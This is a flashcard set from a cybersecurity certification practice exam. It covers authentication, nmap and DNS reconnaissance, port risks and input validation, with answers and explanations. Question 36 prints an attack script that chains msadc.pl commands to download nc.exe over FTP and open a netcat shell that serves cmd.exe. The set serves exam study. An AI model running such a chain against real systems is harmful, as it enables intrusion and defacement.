practice exam 3 Flashcards

Question 1

Q

Which of the following is NOT a means of improving data validation and trust?

A. Encrypting data in transit

B. Using MD5 checksums for files

C. Decrypting data at rest

D. Implementing Tripwire

Answer

A

C. Decrypting data at rest
Explanation
OBJ-1.1: Encrypting data in transit leads to more integrity and confidentiality of the data, and therefore trust. Hashing files using MD5 to check against known valid checksums would provide integrity, and therefore validation and trust. Implementing a file integrity monitoring program, such as Tripwire, would also improve data validation and trust. Decrypting data at rest does not improve data validation, or trust since the data at rest could be modified when decrypted.

Question 2

Q

Which of the following would trigger the penetration tester to stop and contact the system owners during an engagement?

A. Discovery of obsfucated PHI data being stored on the system

B. Discovery of an indicator of compromise on a production server

C. Discovery of missing Windows security patches on a production server

D. Discovery of default credentials on an appliance in a staging network

Answer

A

B. Discovery of an indicator of compromise on a production server
Explanation
OBJ-1.1: The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contract their trusted point of contact within the organization to get further guidance.

Question 3

Q

Which of the following identity and access management controls relies upon using a certificate-based authentication mechanism?

A. HOTP

B. Smart card

C. TOTP

D. Proximity card

Answer

A

B. Smart card
Explanation
OBJ-1.1: Smart cards, PIV, and CAC devices are used as an identity and access management control. These devices contain a digital certificate embedded within the smart card (PIV/CAC) presented to the system when it is inserted into the smart card reader. When combined with a PIN, the smart card can be used as a multi-factor authentication mechanism. The PIN unlocks the card and allows the digital certificate to be presented to the system.

Question 4

Q

What type of scan will measure the size or distance of a person’s external features with a digital video camera?

A. Iris scan

B. Retinal scan

C. Facial recognition scan

D. Signature kinetics scan

Answer

A

C. Facial recognition scan
Explanation
OBJ-1.1: A face recognition system is a computer application capable of identifying or verifying a person from a digital image or a video frame from a video source. One way to do this is by comparing selected facial features from the image and a face database. By measuring the external facial features, such as the distance between your eyes and nose, you can uniquely identify the user. A retinal scan is a biometric technique that uses unique patterns on a person’s retina blood vessels. Iris recognition or iris scanning is the process of using visible and near-infrared light to take a high-contrast photograph of a person’s iris. A signature kinetics scan measures a user’s action when signing their name and compares it against a known-good example or baseline.

Question 5

Q

Which of the following will an adversary so during the exploitation phase of the Lockheed Martin kill chain? (SELECT THREE)
A. Take advantage of a software, hardware, or human vulnerability

B. Select backdoor implant and appropriate command and control infrastructure for operation

C. Wait for a malicious email attachment to be opened

D. Wait for a user to click on a malicious link

E. A webshell is installed on a web server

F. A backdoor/implant is placed on a victim’s client

Answer

A

A. Take advantage of a software, hardware, or human vulnerability
C. Wait for a malicious email attachment to be opened
D. Wait for a user to click on a malicious link
Explanation
OBJ-1.1: During this phase, activities taken during the exploitation phase are conducted against the target’s system. Taking advantage of or exploiting an accessible vulnerability, waiting for a malicious email attached to be opened, or waiting for a user to click on a malicious link is all part of the exploitation phase. The installation of a web shell, backdoor, or implant is all performed during the installation phase. Selecting a backdoor implant and appropriate command and control infrastructure occurs during the weaponization phase.

Question 6

Q

What should administrators perform to reduce a system’s attack surface and remove unnecessary software, services, and insecure configuration settings?

A. Harvesting

B. Windowing

C. Hardening

D. Stealthing

Answer

A

C. Hardening
Explanation
OBJ-1.1: Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle, a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, removing unnecessary software, unnecessary usernames or logins, and disabling or removing unnecessary services. Windows is the use of windows for the simultaneous display of more than one item on a screen. Harvesting is the process of gathering data, normally user credentials. Stealthing is a made-up term in this question.

Question 7

Q

Which of the following pairs of authentication factors should you choose to meet the requirements associated with MFA?

A.Username and password

B. Username and pin

C. Thumbprint and password

D. Thumbprint and retina scan

Answer

A

C. Thumbprint and password
Explanation
OBJ-1.1: Multi-factor authentication (MFA) requires a user to provide at least two different forms of authentication: something you know (username, password, pin), something you have (token, key fob, smartphone), something you are (fingerprint, retina scan), something you do (the way you speak a phrase or sign your name), or somewhere you are (location factor based on IP address or geolocation).

Question 8

Q

Which of the following provides accounting, authorization, and authentication via a centralized privileged database, as well as challenge/response and password encryption?

A. Multi-factor authentication

B. ISAKMP

C. TACACS+

D. Network access control

Answer

A

C. TACACS+
Explanation
OBJ-1.1: TACACS+ is a AAA (accounting, authorization, and authentication) protocol to provide AAA services for access to routers, network access points, and other networking devices.

Question 9

Q

A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company’s security controls. Which DNS assessment technique would be classified as active?

A. A DNS forward or reverse lookup

B. A zone transfer

C. A whois query

D. Using maltego

Answer

A

B. A zone transfer
Explanation
OBJ-2.1: DNS zone transfer, also sometimes known by the inducing DNS query type AXFR, is a DNS transaction type. It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers. DNS zone transfers are an active technique. Performing a whois query is a passive reconnaissance technique that performs a query of the databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. Performing a DNS forward and reverse lookup zones is an active technique that allows the resolution of names to IP addresses and IP addresses to names. This can be conducted as a passive technique. Maltego is used for open-source intelligence and forensics. It focuses on providing a library for data discovery from open sources and visualizing that information in a graph format suitable for link analysis and data mining. It collects this information passively since it can acquire the information from whois lookup servers, a DNS lookup tool using public DNS servers, or even emails and hostnames one can acquire from TheHarvester.

Question 10

Q

You are working as part of a penetration testing team conducting engagement against Dion Training’s network. You have been given a list of targets in a text file called servers.txt. Which of the following Nmap commands should you use to find all the servers from the list with ports 80 and 443 enabled and save the results in a greppable file called results.txt?

A. nmap -p80,443 -sL servers.txt -oX results.txt

B. nmap -p80,443 -iL servers.txt -oX results.txt

C. nmap -p80,443 -iL servers.txt -oG results.txt

D. nmap -p80,443 -sL servers.txt -oG results.txt

Answer

A

C. nmap -p80,443 -iL servers.txt -oG results.txt
Explanation
OBJ-2.2: The command (nmap -p80,443 -iL servers.txt -oG results.txt) will only perform an nmap scan against ports 80 and 443. The -iL option will scan each of the listed server’s IP addresses. The -oG option will save the results in a greppable format to the file results.txt while still displaying the normal results to the shell. The option of -sL will only list the servers to scan. It will not actually scan them. The option of -oX is for outputting the results to a file in an XML format.

Question 11

Q

An attacker uses the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only name servers?

A. locate type=ns

B. request type=ns

C. set type=ns

D. transfer type=ns

Answer

A

C. set type=ns
Explanation
OBJ-2.1: The “set type=ns” tells nslookup only reports information on name servers. If you used “set type=mx” instead, you would receive information only about mail exchange servers.

Question 12

Q

As a newly hired cybersecurity analyst, you are attempting to determine your organization’s current public-facing attack surface. Which of the following methodologies or tools generates a current and historical view of the company’s public-facing IP space?

A. shodan.io

B. nmap

C. Google hacking

D. Review network diagrams

Answer

A

A. shodan.io
Explanation
OBJ-2.1: Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company’s public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company’s network. The nmap scanning tool can provide an analysis of the current state of public exposure but has no mechanism to determine the history, nor will it give the same depth of information that shodan.io provides. Google Hacking can determine if a public exposure occurred over public-facing protocols, but it cannot conclusively reveal all the exposures present. Google hacking relies on using advanced Google searches with advanced syntax to search for information across the internet. Network diagrams can show how a network was initially configured. Unless the diagrams are up-to-date, which they usually aren’t, they cannot show the current “as is” configuration. If you can only select one tool to find your attack surface’s current and historical view, shodan is your best choice.

Question 13

Q

You have just finished running an nmap scan on a server are see the following output:

-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
# nmap diontraining.com 
Starting Nmap ( http://nmap.org )

Nmap scan report for diontraining.com (64.13.134.52)
Not shown: 996 filtered ports

PORT STATE
22/tcp open
23/tcp open
53/tcp open
443/tcp open
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
-=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=-

Based on the output above, which of the following ports listed as open represents the most significant security vulnerability to your network?

A. 22

B. 23

C. 53

D. 443

Answer

A

B. 23
Explanation
OBJ-2.2: Port 23 is used by telnet and is not considered secure because it sends all of its data in cleartext, including authentication data like usernames and passwords. As an analyst, you should recommend that telnet is disabled and blocked from use. The other open ports are for SSH (port 22), DNS (port 53), and HTTPS (port 443).

Question 14

Q

You are working as a service desk analyst. This morning, you have received multiple calls from users reporting that they cannot access websites from their work computers. You decide to troubleshoot the issue by opening up your command prompt on your Windows machine and running a program to determine where the network connectivity outage occurs. Which tool should you use to determine if the issue is on the intranet portion of your corporate network or if it is occurring due to a problem with your ISP?

A. netstat

B. nslookup

C. ping

D. tracert

Answer

A

D. tracert
Explanation
OBJ-2.1: Tracert is a command-line utility used to trace an IP packet’s path as it moves from its source to its destination. While using ping will tell you if the remote website is reachable or not, it will not tell you where the connection is broken. Tracert performs a series of ICMP echo requests to determine which device in the connection path is not responding appropriately. This will help to identify if the connectivity issue lies within your intranet or is a problem with the ISP’s connection.

Question 15

Q

You are developing your vulnerability scanning plan and attempting to scope your scans properly. You have decided to focus on the criticality of a system to the organization’s operations when prioritizing the system in the scope of your scans. Which of the following would be the best place to gather the criticality of a system?

A. Ask the CEO for a list of the critical systems

B. Conduct a nmap scan of the network to determine the OS of each system

C. Scope the scan based on IP subnets

D. Review the asset inventory and BCP

Answer

A

D. Review the asset inventory and BCP
Explanation
OBJ-2.1: To best understand a system’s criticality, you should review the asset inventory and the BCP. Most organizations classify each asset in its inventory based on its criticality to the organization’s operations. This helps to determine how many spare parts to have, the warranty requirements, service agreements, and other key factors to help keep these assets online and running at all times. Additionally, you can review the business continuity plan (BCP) since this will provide the organization’s plan for continuing business operations in the event of a disaster or other outage. Generally, the systems or operations listed in a BCP are the most critical ones to support business operations. While the CEO may be able to provide a list of the most critical systems in a large organization, it isn’t easy to get them to take the time to do it, even if they did know the answer. Worse, in most large organizations, the CEO isn’t going to know what systems he relies on, but instead just the business functions they serve, again making this a bad choice. While conducting a nmap scan may help you determine what OS is being run on each system, this information doesn’t help you determine criticality to operations. The same is true of using IP subnets since a list of subnets by itself doesn’t provide criticality or prioritization of the assets.

Question 16

Q

What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?

A. A stealth scan that scans ports 80 and 443

B. A stealth scan that scans ports 80 to 443

C. A stealth scan that scans all open ports excluding ports 80 to 443

D. A stealth scan that scans all ports from 80 to 443 and determines a target’s operating system

Answer

A

D. A stealth scan that scans all ports from 80 to 443 and determines a target’s operating system
Explanation
OBJ-2.2: When using NMAP, the -sS tells the tool to use a stealth scan using a TCP SYN packet, the -O is used to determine the operating system, and -p dictates which ports to scan. Since the ports were listed as 80-443, this indicates it includes all the ports from 80 through 443.

Question 17

Q

A security analyst conducts a nmap scan of a server and found that port 25 is open. What risk might this server be exposed to?

A. Open file/print sharing

B. Web portal data leak

C. Clear text authentication

D. Open mail relay

Answer

A

D. Open mail relay
Explanation
OBJ-2.2: Port 25 is the default port for SMTP (Simple Message Transfer Protocol), which is used for sending an email. An active mail relay occurs when an SMTP server is configured in such a way that it allows anyone on the Internet to send email through it, not just mail originating from your known and trusted users. Spammers can exploit this type of vulnerability to use your email server for their own benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service, such as telnet (23), FTP (20/21), or the web (80).

Question 18

Q

A penetration test tester conducts an ACK scan using nmap against the external interface of a DMZ firewall. Nmap reports port 80 as “unfiltered”. What type of packet inspection is the firewall performing?

A. Host inspection

B. Stateful inspection

C. Stateless inpsection

D. Application-level inspection

Answer

A

C. Stateless inpsection
Explanation
OBJ-2.2: The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Based on the unfiltered port state, the firewall must be performing stateless inspection. Stateless firewalls watch network traffic, and restrict or block packets based on source and destination addresses or other static values. They are not ‘aware’ of traffic patterns or data flows. A stateless firewall uses simple rule-sets with ACLs.

Question 19

Q

What system contains a publicly available set of databases with registration contact information for every domain name on the Internet?

A. WHOIS

B. IANA

C. CAPTCHA

D. IETF

Answer

A

A. WHOIS
Explanation
OBJ-2.1: WHOIS is a query and response protocol widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. WHOIS also is used for a broader range of information. The protocol stores and delivers database content in a human-readable format and is publicly available for use. The Internet Assigned Numbers Authority is a standards organization that oversees global IP address allocation, autonomous system number allocation, root zone management in the Domain Name System, media types, and other Internet Protocol-related symbols and Internet numbers. A CAPTCHA is a type of challenge-response test used in computing to determine whether the user is human. The Internet Engineering Task Force (IETF) is an open standards organization that develops and promotes voluntary Internet standards, particularly the standards that comprise the Internet protocol suite.

Question 20

Q

If you want to conduct an operating system identification during a nmap scan, which syntax should you utilize?

A. nmap -os

B. nmap -O

C. nmap -id

D. nmap -osscan

Answer

A

B. nmap -O
Explanation
OBJ-2.2: The -O flag indicates to nmap that it should attempt to identify the target’s operating system during the scanning process. It does this by evaluating the responses it received during the scan against its signature database for each operating system.

Question 21

Q

During scanning and enumeration, you have identified that a port 69 is open on a server. Which fo the following risks exist on this server?

A. Weak SSL cipher implementation

B. Cleartext log ins are accepted

C. Web portal informationn disclosure

D. Unauthenticated access to the server

Answer

A

D. Unauthenticated access to the server
Explanation
OBJ-2.3: Trivial File Transfer Protocol (TFTP) uses port 69. TFTP allows a client to get a file from or put a file onto a remote host. TFTP has no login or access control mechanisms, therefore if it is used it could allow unauthenticated access to the server.

Question 22

Q

What techniques are commonly used by port and vulnerability scanners to identify the services running on a target system?

A. Comparing response fingerprints and registry scanning

B. Banner grabbing and UDP response timing

C. Using the -O option in nmap and UDP response timing

D. Banner grabbing and comparing response fingerprints

Answer

A

D. Banner grabbing and comparing response fingerprints
Explanation
OBJ-2.2: Service and version identification are often performed by conducting a banner grab or by checking responses for services to known fingerprints for those services. UDP response timing and other TCP/IP stack fingerprinting techniques are used to identify operating systems only. Using nmap -O will conduct an operating system fingerprint scan, but it will not identify the other services being run.

Question 23

Q

Which of the following tools is used by a penetration tester to conduct open-source intelligence (OSINT)?

A. Nessus

B. Maltego

C. Empire

D. AirCrack-NG

Answer

A

B. Maltego
Explanation
OBJ-2.1: Maltego is an OSINT tool that is used to gather information from public resources. It has a graphical user interface (GUI) that visualizes the information gathered to help a penetration tester make logical connections between the different data sets collected.

Question 24

Q

Which protocol relies on mutual authentication of the client and the server for its security?

A. RADIUS

B. Two-factor authentication

C. LDAPS

D. CHAP

Answer

A

C. LDAPS
Explanation
OBJ-2.3: The Lightweight Directory Access Protocol (LDAP) uses a client-server model for mutual authentication. LDAP is used to enable access to a directory of resources (workstations, users, information, etc.). TLS provides mutual authentication between clients and servers. Since Secure LDAP (LDAPS) uses TLS, it provides mutual authentication.

Question 25

Q

You have been asked to add an entry to your DNS records to allow SMTP traffic to be sent out using your domain name. Which type of record should you add to your DNS record?

A. CNAME

B. A

C. MX

D. AAAA

Answer

A

C. MX
Explanation
OBJ-2.1: An MX record is used for outgoing (SMTP) and incoming (POP3/IMAP) traffic. An A record associates your domain name with an IPv4 address. An AAAA record associates your domain name with an IPv6 address. A CNAME record is a canonical name or alias name, which associates one domain name as an alias of another (like beta.diontraining.com and www.diontraining.com could refer to the same website using a CNAME).

Question 26

Q

Which of the following ports is used by LDAP by default?

A. 53

B. 389

C. 427

D. 3389

Answer

A

B. 389
Explanation
OBJ-2.2: LDAP uses port 389 by default. LDAP (Lightweight Directory Access Protocol) Standard for accessing and updating information in an X.500-style network resource directory. Unless secure communications are used, LDAP is vulnerable to packet sniffing and Man-in-the-Middle attacks. It is also usually necessary to configure user permissions on the directory. LDAP version 3 supports simple authentication or Simple Authentication and Security Layer, which integrates it with Kerberos or TLS.

Question 27

Q

You have been asked to determine if Dion Training’s web server is vulnerable to a recently discovered attack on an older version of SSH. Which technique should you use to determine the current version of SSH running on their web server?

A. Vulnerability scan

B. Protocol analysis

C. Passive scan

D. Banner grabbing

Answer

A

D. Banner grabbing
Explanation
OBJ-2.2: Banner grabbing is conducted by actively connecting to the server using telnet or netcat and collecting the web server’s response. This banner usually contains the server’s operating system and the version number of the service (SSH) being run. This is the fastest and easiest way to determine the SSH version being run on this web server. While it is possible to use a vulnerability scanner, protocol analyzer, or to conduct a passive scan to determine the SSH version, these are more time consuming and not fully accurate methods to determine the version being run.

Question 28

Q

A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public webserver. The analyst opens up the terminal on his Kali Linux workstation and uses netcat to gather some information.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1

HTTP/1.1 200 OK
Date: Sun, 12 Jun 2020 14:12:45 AST
Server: Apache/2.0.46 (Unix)   (Red Hat/Linux)
Last-modified: Thu, 16 Apr 2009 11:20:14 PST
ETgag: “1986-69b-123a4bc6”
Accept-Ranges: bytes
Content-Length: 6485
Connection: close
Content-Type: text/html
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of action did the analyst perform, based on the command and response above?

A. Cross-site scripting

B. Banner grabbing

C. SQL injection

D. Querying the Whois database

Answer

A

B. Banner grabbing
Explanation
OBJ-2.1: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command “nc test.diontraining.com 80” was used to establish a connection to a target web server using netcat, then send an HTTP request (HEAD / HTTP/1.1). The response contains information about the service running on the webserver. In this example, the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the server’s operating system.

Question 29

Q

Which of the following commands can be used to resolve a DNS name to an IP address?

A. dns

B. query

C. host

D. iplookup

Answer

A

C. host
Explanation
OBJ-2.1: The host command is used for DNS (Domain Name System) lookup operations. It is used to find the IP address of a particular domain name or the domain name of a particular IP address. Nslookup and dig are also commands that can be used to lookup a domain name and convert it to an IP address within a Linux system.

Question 30

Q

A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the Operating System version of the system installed at 192.168.1.45. The analyst asks you to look over the results of their nmap scan results:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Starting NMAP 7.60 at 2020-06-12 21:23:15

NMAP scan report for 192.168.1.45
Host is up (0.78s latency).
Not shown: 992 closed ports

PORT  STATE  SERVICE
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
515/tcp open
631/tcp open ipp
9100/tcp open
MAC Address: 00:0C:29:18:6B:DB
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following operating systems is most likely used by the host?

A. Windows server

B. Linux server

C. Windows workstation

D. Networked printer

Answer

A

D. Networked printer
Explanation
OBJ-2.2: Based on the open ports, it is likely that the host is a networked printer. Port 515 is used as an LPR/LPD port for most printers and older print servers. Port 631 is used for IPP for most modern printers and CUPS-based print servers. Port 9100 is used as a RAW port for most printers and is also known as the direct-IP port. If any of these three ports are found, the host is likely a printer. If ports 135, 139, 445 are found, this is usually a good indication of a Windows file server. Port such as FTP, telnet, SMTP, and http is used by both Windows and Linux servers; therefore, they are not as helpful to indicate which operating system is in use by the host.

Question 31

Q

A penetration tester hired by a bank began searching for the bank’s IP ranges by performing lookups on the bank’s DNS servers, reading news articles online about the bank, monitoring what times the bank’s employees came into and left work, searching job postings (with a special focus on the bank’s information technology jobs), and even searching the corporate office of the bank’s dumpster. Based on this description, what portion of the penetration test is being conducted?

A. Information reporting

B. Vulnerability assessment

C. Active information gathering

D. Passive information gathering

Answer

A

D. Passive information gathering
Explanation
OBJ-2.1: Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed. Instead, active information gathering starts to probe the organization using DNS Enumeration, Port Scanning, and OS Fingerprinting techniques. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.

Question 32

Q

Which of the following ports are used to provide secure remote connection sessions over the Internet?

A. 22

B. 25

C. 80

D. 23

Answer

A

A. 22
Explanation
OBJ-2.2: Port 22 is used by Secure Shell (SSH) to securely create communication sessions over the Internet for remote access to a server or system. Telnet used to be used over port 23, but it is insecure and doesn’t provide an encrypted tunnel like SSH does. Port 25 is for SMTP, and Port 80 is for HTTP, neither of which provide an encrypted tunnel, either.

Question 33

Q

A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?

A. Returns no useful results for an attacker

B. Returns all web pages containing the text diontraining.com

C. Returns all web pages containing an email address affiliated with diontraining.com

D. Returns all web pages hosted at diontraining.com

Answer

A

C. Returns all web pages containing an email address affiliated with diontraining.com
Explanation
OBJ-2.1: Google interprets this statement as <.anything>@diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol. The * is a wild card character meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear-phishing campaign. To return all web pages hosted at diontraining.com, you should use the “site:” modifier in the query. To return all web pages with the text diontraining.com, enter “diontraining.com” into the Google search bar with no modifiers to return those results.

Question 34

Q

Which of the following port or ports does SIP use?

A. 443

B. 389/636

C. 135/139/445

D. 5060/5061

Answer

A

D. 5060/5061
Explanation
OBJ-2.3: SIP works with other protocols over 5060/5061. 443 is HTTPS, 389/636 is LDAP, and 135/139/445 is NetBIOS and SMB.

Question 35

Q

A cybersecurity analyst at Yoyodyne Systems just finished reading a news article about their competitor, Whamiedyne Systems, being hacked by an unknown threat actor. Both companies sell to the same basic group of consumers over the internet since their products are used interchangeably by consumers. Which of the following is a valid cybersecurity concern for Yoyodyne Systems?

A. The attacker will conduct a man-in-the-middle attack

B. The same vulnerability will be compromised on their servers

C. The attacker will conduct a SQL injection against their database

D. They may now be vulnerable to a credential stuffing attack

Answer

A

D. They may now be vulnerable to a credential stuffing attack
Explanation
OBJ-5.1: The largest and most immediate cybersecurity concern that the analyst should have is credential stuffing. Credential stuffing occurs when an attacker tests username and password combinations against multiple online sites. Since both companies share a common consumption group, it is likely that some of Yoyodyne’s consumers also had a user account at Whamiedyne. If the attackers compromised the username and passwords from Whamiedyne’s servers, they might attempt to use those credentials on Yoyodyne’s servers, too. There is no definitive reason to believe that both companies are using the same infrastructure. Therefore, the same vulnerability that was exploited by the attacker may not exist at Yoyodyne. The question doesn’t mention an SQL database. Therefore, there is no direct threat of an SQL injection. A man-in-the-middle (MitM) attack occurs when the attacker sits between two communicating hosts and transparently captures, monitors, and relays all communications between the host. Nothing in this question indicates that a MitM was utilized or is a possible threat.

Question 36

Q

A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
system(“perl msadc.pl -h $host -C "echo $user»tempfile"”);
system(“perl msadc.pl -h $host -C "echo $pass»tempfile"”);
system(“perl msadc.pl -h $host -C "echo bin»tempfile"”);
system(“perl msadc.pl -h $host -C "echo get nc.exe»tempfile"”);
system(“perl msadc.pl -h $host -C "echo get hacked.html»tempfile"”);
(“perl msadc.pl -h $host -C "echo quit»tempfile"”);
system(“perl msadc.pl -h $host -C "ftp -s:tempfile"”);
$o=; print “Opening FTP connection…\n”;
system(“perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe"”);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which exploit type is indicated by this script?

A. Buffer overflow exploit

B. Chained exploit

C. SQL injection exploit

D. Denial of Service exploit

Answer

A

B. Chained exploit
Explanation
OBJ-5.2: The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly where a program that occurs while writing data to a buffer overruns the buffer’s boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions.

Question 37

Q

Which of the following is the leading cause for cross-site scripting, SQL injection, and XML injection attacks?

A. Directory traversals

B. File inclusions

C. Faulty input validation

D. Output encoding

Answer

A

C. Faulty input validation
Explanation
OBJ-5.1: A primary vector for attacking applications is to exploit faulty input validation. The input could include user data entered into a form or URL, passed by another application or link. This is heavily exploited by cross-site scripting, SQL injection, and XML injection attacks. Directory traversal is the practice of accessing a file from a location that the user is unauthorized to access. The attacker does this by ordering an application to backtrack through the directory path to read or execute a file in a parent directory. In a file inclusion attack, the attacker adds a file to a web app or website’s running process. The file is either constructed to be malicious or manipulated to serve the attacker’s malicious purposes. Cross-site scripting (XSS) is one of the most powerful input validation exploits. XSS involves a trusted site, a client browsing the trusted site, and the attacker’s site.

Question 38

Q

Which of the following vulnerabilities can be prevented by using proper input validation? (Select ANY that apply)

A. Cross-site scripting

B. SQL injection

C. Directory traversal

D. XML injection

Answer

A

A. Cross-site scripting

B. SQL injection

C. Directory traversal

D. XML injection
Explanation
OBJ-5.1: Proper input validation can prevent cross-site scripting, SQL injection, directory traversal, and XML injections from occurring. When an application accepts string input, the input should be subjected to normalization or sanitization procedures before being accepted. Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. This can prevent SQL and XML injections from occurring. Input validation is also good at preventing cross-site scripting (XSS) in forms that accept user input. Directory traversals can be prevented by conducting input validation in file paths or URLs accepted from a user. This prevents a canonicalization attack from disguising the nature of the malicious input that could cause a directory traversal.

Question 39

Q

A penetration tester is conducting software assurance testing on a web application for Dion Training. You discover the web application is vulnerable to an SQL injection and could disclose a regular user’s password. Which of the following actions should you perform?

A. Conduct a proof-of-concept exploit on three user accounts at random and document this in your report

B. Document the finding with an executive summary, methodology used, and a remediation recommendation

C. Contact the development team directly and recommend adding input validation to the web application

D. Recommend that the company conduct a full penetration test of their systems to identify other vulnerabilities

Answer

A

B. Document the finding with an executive summary, methodology used, and a remediation recommendation
Explanation
OBJ-5.3: When you find a vulnerability, it should be documented fully. This includes providing an executive summary for management, the methodology used to find the vulnerability so that others can recreate and verify it, and the recommendation remediation actions that should be taken. You should not exploit three random accounts on the server, which could negatively impact the client’s reputation. You should not contact the development team directly since they may ignore your recommendation, and they did not hire you. While it may be a good idea to conduct a full-scale penetration test, that would not necessarily solve this vulnerability.

Question 40

Q

Which of the following is NOT a valid reason to conduct reverse engineering?

A. To commit industrial espionage

B. To determine how a piece of malware operates

C. To allow the software developer to spot flaws in their source code

D. To allow an attacker to spot vulnerabilities in an executable

Answer

A

C. To allow the software developer to spot flaws in their source code
Explanation
OBJ-5.1: If a software developer has a copy of their source code, there is no need to reverse engineer it since they can directly examine the code. Doing this is known as static code analysis, not reverse engineering. Reverse engineering is the process of analyzing a system’s or application’s structure to reveal more about how it functions. In malware, examining the code that implements its functionality can provide you with information about how the malware propagates and its primary directives. Reverse engineering is also used to conduct industrial espionage since it can allow a company to figure out how a competitor’s application works and develop its own version. An attacker might use reverse engineering of an application or executable to identify a flaw or vulnerability in its operation and then exploit that flaw as part of their attack.

Question 41

Q

Which of the following secure coding best practices ensures special characters like <, >, /, and ‘ are not accepted from the user via a web form?

A. Session management

B. Output encoding

C. Error handling

D. Input validation

Answer

A

D. Input validation
Explanation
OBJ-5.3: Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering a malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the user. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID. Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the < string when writing to an HTML page.

Question 42

Q

Your team is developing an update to a piece of code that allows customers to update their billing and shipping addresses in the web application. The shipping address field used in the database was designed with a limit of 75 characters. Your team’s web programmer has brought you some algorithms that may help prevent an attacker from trying to conduct a buffer overflow attack by submitting invalid input to the shipping address field. Which pseudo-code represents the best solution to prevent this issue?

A. if (shippingAddress = 75) {update field} else exit

B. if (shippingAddress != 75) {update field} else exit

C. if (shippingAddress >= 75) {update field} else exit

D. if (shippingAddress <= 75) {update field} else exit

Answer

A

D. if (shippingAddress <= 75) {update field} else exit
Explanation
OBJ-5.2: To ensure that the field is not overrun by an input that is too long, input validation must occur. Checking if the shipping address is less than or equal to 75 characters before updating the field will prevent a buffer overflow from occurring in this program. If the input is 76 characters or more, then the field will not be updated, and the algorithm will exit the function.

Question 43

Q

You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server’s logs if your organization uses the default naming convention?

A. httpd_log

B. apache_log

C. access_log

D. http_log

Answer

A

C. access_log
Explanation
